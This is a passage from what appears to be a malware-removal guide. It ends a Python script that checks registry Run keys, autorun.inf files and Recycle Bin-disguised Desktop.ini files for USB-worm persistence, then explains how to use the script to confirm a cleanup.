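            return cp.get(section, "clsid", fallback="").strip().upper() == RECYCLE_BIN_CLSID
    return False


if __name__ == "__main__":
    for hit in persistence_hits(parse_reg_query(REG_QUERY_OUTPUT)):
        print("persistence:", hit)
    print("autorun launches:", autorun_targets(AUTORUN_INF))
    print("recycle-bin disguise:", masquerades_as_recycle_bin(DESKTOP_INI))
```

On the infected host, feed the script the output of "reg query" for each of the six key paths in step 4 (HKLM and HKCU, Run and RunServices), and the contents of every autorun.inf and Desktop.ini found on removable media; an empty hit list after the reboot is the confirmation the manual procedure otherwise lacks.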